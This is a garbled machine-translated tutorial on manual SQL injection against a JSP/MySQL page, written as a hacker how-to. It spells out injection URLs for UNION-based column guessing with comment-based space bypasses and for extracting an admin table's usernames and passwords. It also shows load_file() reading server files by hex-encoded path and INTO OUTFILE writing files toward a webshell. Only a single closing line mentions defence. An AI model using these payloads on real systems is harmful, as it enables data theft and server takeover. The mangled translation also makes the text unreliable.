The SQL injection methods are very common and easy to use. Generally, "hackers" use ready-made tools, such as "web bypass, a D network toolkit, and the instructor xxx". These tools are integrated.
Some common SQL Injection statements. Next I will introduce how to manually inject MySQL and MSSQL databases. cause of general vulnerabilities: sensitive characters are not filtered during program execution, which allows attackers to merge incoming malicious strings with structured data query statements and execute malicious code.
MySQL code for creating a text data table:
Create Database if not exists 'test ';
Use 'test ';
/* Table Structure of the data table 'account */
Drop table if exists 'account ';
Create Table 'account' ('accountid' bigint (20) not null auto_increment, 'accountname' varchar (32) default null, 'accountpass' varchar (32) default null, primary Key ('accountid') engine = InnoDB default charset = Latin1;
/* Data of the Data Table 'account */
Insert into 'account' values (1, 'account1', 'account1 ');
/* Table Structure of the data table 'admin */
Drop table if exists 'admin ';
Create Table 'admin' ('adminid' bigint (20) not null auto_increment, 'adminname' varchar (32) default null, 'adminpass' varchar (32) default null, primary Key ('adminid') engine = InnoDB default charset = Latin1;
/* Insert data into the data table 'admin */
Insert into 'admin' values (1, 'admin', 'admin ');
2. Exploitation of Vulnerabilities
This is the record in the database. yellow is the key statement, and red is the input part. please note that resultset = statment.exe cutequery ("select * from account where accountid = '" + request. getparameter ("ID") + "'"); The request here. getparameter ("ID") is the ID parameter for obtaining the get parameter, that is, mysqlinject. JSP? Id = 1 here ID. This SQL statement becomes select * from account where accountid =
'1'. What if it is changed?
2.1 How can we write the ID as mysqlinject. jsp? Id = 1' then the SQL statement becomes select * from account where accountid = '1', so the SQL statement will report an error because the value of the SQL statement requires two
Symbol, such as 'and'. If it is only a number, nothing can be written. if no error is reported, the program is replaced, filtered, or otherwise protected. so we can continue the test, mysqlinject. JSP? Id = 1 'and ''= '.
The SQL statement becomes select * from account where accountid = '1' and ''='', and the returned result is normal. Some people say why is my return abnormal? There are two reasons: first, the program filters out malicious characters;
Second, the statement of the program is different from the one I wrote. Select * from account where accountid = 1 'and ''='. This issue will be discussed below.
2.2 Union Query
Here some people will explain what is the use of the number of columns in this query? If you only want to perform the check, but you want to make further use of it, it will be of great use. We will talk about patience later in this article. If you understand SQL, you should know the Union query.
Right? Union query is a joint query. Execute the second query statement to merge the return value with the current query. If you want to merge the query value with this query, what are the conditions required? The number of columns to be jointly queried is the same as the number of columns to be queried. if you don't want to wait, the merge will fail, and an error will be reported. if you are smart with this feature, should you come up with the number of columns? So what we need is to make the number of columns queried by Union equal to the number of columns queried by this query. that is to say, if no error is reported, it will be equal. first, start to guess from the first column. Therefore, we need to construct the Union select 1 Statement in the statement of the address program. the statement is mysqlinject. JSP? Id = 1 'and Union select 1 and ''='. Some people ask why
And ''= 'must be added to the edge (green part? You may have noted that our SQL statement requires two symbols. The statement select * from account where accountid = '1' is at the position 1
To remove the following ', otherwise the statement will report an error. in this program, if you want to eliminate it, there are many ways to make it clear, so I am using and ''= 'now '. there are several ways to eliminate this. although it is not convenient to use and ''= ', no error is reported in complicated SQL statements. 2. note # Or/**/to comment out all the following items. However, an error may occur when executing complicated SQL statements. some people test, why? Why do I still report an error when I add? This is because we use get to transfer parameters. in the address bar, we will try to see how the database with # name was downloaded? Oh, by the way, # is the end of the address bar, that is #
Including # All subsequent characters are not passed in. So # injection does not work in get mode. Why is it mysqlinject. jsp written by some tools when constructing injection? Id = 1'/**/AND/**/Union/**/select/**/1/**/AND/**/''/**/=? Because there are functions in the program that can pass in
The space in the parameter is removed. If the space is removed, the program will generate an incorrect statement, and an error will always be reported. therefore, some tools replace spaces. so what is? /**/Is a kind of note
Description: it is called a document comment, that is, from/* to */, and any code in the middle will become a comment. Therefore, it is a comment used by programmers to write a large number of comments. so what is the last? Which is used to solve the SQL statement package
The symbols are not paired.
Let's start testing. mysqlinject. jsp? Id = 1'/**/Union/**/select/**/1/* select * from account where accountid = '1'/**/Union /**/ select/**/1 /*'.
Have you noticed the lowest sentence? Javax. servlet. servletexception: The used select statements have a different number of columns probably means "the number of queried columns is different", so it is concluded that this query is not a query.
A table. similarly, select 1 select 1 1, 2 select 1, 2, and 3 know the correct position. The number of columns you want to write is the number of columns in this query. 1 | 2 | 3 | is returned from our Union
In the query. Try to replace 'Union select 1, 2, 3 with 'Union select 4, 5, 6. See if the underground program is 4 | 5 | 6 |? Some people say that you are deceiving me. How can I change it? I haven't switched it to 789. I still believe in the original data. You are deceiving me. I am not deceiving you, and I am not deceiving you; so why is it? Some programs only return the first row of output data in the set when writing data. However, after union queries merge the data into this query, it only outputs the data for this query, in fact, Union queries also contain data, but it does not
What should I do? Smart people will think of it. Ah, it turns out that as long as this query is not output. Hahaha, I am smart, but how can I make this query unavailable? Let's take a look at the SQL statements in a simple way,
Where accountid =? So that the accoundid is limited to a non-existing ID, then there will be no? It's not as exciting as action. Try. mysqlinject. jsp? Id = 100'/**/Union/**/select/**/1000, 6/* select * from account where accountid = 100'/**/Union/**/select/**/1000, 6 /*
Haha, no !!! Pay attention to the green part and specify an ID that does not exist in the query. This will naturally evaporate. 2.3 low probability alternative guess the number of columns queried this method although the probability is a little lower, but it will greatly reduce the workload. this method is only applicable to select * simple SQL statements. this method uses order sorting in MySQL. sort by order. let's write an SQL statement. select * from account where accountid = '1' order by accountid.
The SQL statement is sorted by accountid in ascending order. So we don't know what to do with it? This is a key issue. MySQL supports column number sorting select * from account where accountid =
'1' order by 1, that is, sorting by the first column. Oh, you're lying to us again. How can you guess the number of columns? So what if I sort by a column that does not exist? For example, the fourth column? You generally have three pockets, one for a maximum of 10 yuan, one meal a day, one for three, one for one, but today
It takes 40 yuan to eat 4 kg of rice a day, but you only have 3 pockets, you don't have 40 yuan, and you will be beaten. that is to say, there are three columns in total, order by 3, sorted by 3rd columns, normal, order by 4, sorted by 4th columns, no 4th columns, error. it indicates that there are four columns. this method is based on human experience. I usually use this method to succeed, that is, the failure is similar.
2.4 use Union to guess other tables. You can use this method to query other tables. for example, query the administrator password. however, there is a prefix. Only the table name and column name are required. so how can we know? Guess !!! Because the system functions of MySQL and sqlserver are different
Sample: SQL Server has sp_helpdb but MySQL does not, so you can only guess. Well, start to construct the statement. Let's guess if there is any admin table. mysqlinject. jsp? Id = 1'/**/Union/**/select/**/4,5, 6/**/from/**/admin/* SQL: select * from account where accountid = '1'/**/Union/**/select/**/4,5, 6/**/from/**/admin/* 'If the admin table is normal, the return result is normal. If not, an error is returned. have you seen it? We have the admin table. In order to make everyone better understand it, we are guessing another table that does not exist. mysqlinject. jsp? Id = 1'/**/Union/**/select/**/4,5, 6/**/from/**/helloword/* SQL: select * from account where accountid = '1'/**/Union/**/select/**/4,5, 6/**/from/**/helloword /*'
See it? There is no helloworld table. So an error is reported. I asked again, why do I still write, 6? Aha, because we don't know his column name. If we write *, it will all be listed. If it is not the same as the column in this query, an error will be reported. therefore, we need to write an equal. now that the table is named, how can we name the column? Oh, everyone is so smart. I just replaced one of the four, five, and six with a column name? Then construct. mysqlinject. jsp? Id = 1'/**/Union/**/select/**/adminid, 5, 6/**/from/**/admin/* SQL: select * from account where accountid = '1'/**/Union/**/select/**/adminid, 5, 6/**/from/**/admin/* 'Have you seen it? 1 | 5 | 1 of 6 is adminid. if it is normal, it exists. you can guess the column name and bring it into the Union query to find out the Administrator account or password. now I want to put all column names at once
Bring. mysqlinject. jsp? Id = 1'/**/Union/**/select/**/adminid, adminname, adminpass/**/from/**/admin/* SQL: select * from account where accountid = '1'/**/Union/**/select/**/adminid, adminname, adminpass/**/from/**/admin/* 'is displayed. 1 | admin | that is, adminid | adminname | adminpass | You can also set conditions for Union queries, for example, if you know that admin is a user, you can construct Union select adminid, adminname, adminpass from Admin where adminname = 'admin '.
Played. use MySQL system functions. use the load_file () function to display files. as the name suggests. it is to load the file, not to run it. It is to display the content, but it must have the read permission on the file. let's first construct a display C:/boot. INI file statement. mysqlinject. JSP? Id = 1'/**/Union/**/select/**/1, load_file (0x633a5c626f6f742e696e69), 3/* SQL: select * from account where accountid = '1'/**/Union/**/select/**/1, load_file (0x633a5c626f6f742e696e69), 3/* 'Have you seen it? C: The content of the/boot. ini file. I also asked why the load_file () contains garbled characters? It is not garbled. It is C:/boot. ini Hex Encoding. Because this function cannot process directly written paths, it can only be used.
Hexadecimal or ASCII code. therefore, you must convert the path to hexadecimal or ASCII encoding. why is load_file located in the second column, not in the first or third column? Because ah, the first column won't work. The other columns can work. The first column is an int type and a number type. Will you send your girlfriend?
In the men's restroom? Haha. joke. in Linux, you can use/to list directories, but you must have the permission to list directories. you can use load_file to list directories and read files. However, garbled characters may occur during file format encoding. this problem can be solved in this way. use the substring function and substring (string, start, return ). suppose we want to return the third character, which is mysqlinject. JSP? Id = 1'/**/Union/**/select/**/1, substring (load_file (0x633a5c626f6f742e696e69), 3), 3/*, So we return the third
Characters, which is a good solution for garbled characters. use OUTFILE to write webshell. mySQL provides a function to output query results. is OUTFILE. first, construct a simple statement. select 'Hello word' into OUTFILE 'C: // a.txt '. Here we talk about 'Hello word' output to C:/a.txt. Then we will construct it on the website. mysqlinject. JSP? Id = 1'/**/Union/**/select/**/1, 'Hello ', 3/**/into/**/OUTFILE/**/'C: // hello.txt '/* SQL: select * from account where accountid = '1'/**/Union/**/select/**/1, 'Hello ', 3/**/into/**/OUTFILE/**/'C: // hello.txt. but why is an error reported? Oh, that's because you write data to a file, and the returned set has nothing to do with it. Of course, an error will be reported. if you replace hello with one sentence or another, if you write it to the website directory, it is
How horrible...
2. vulnerabilities are protected by filtering out special keywords. there are many code websites, so I will not write them here. there is a protection against Java, that is, using the preparedstatement object for queries. this article is just a summary. If applied to practice, you need to combine experience.
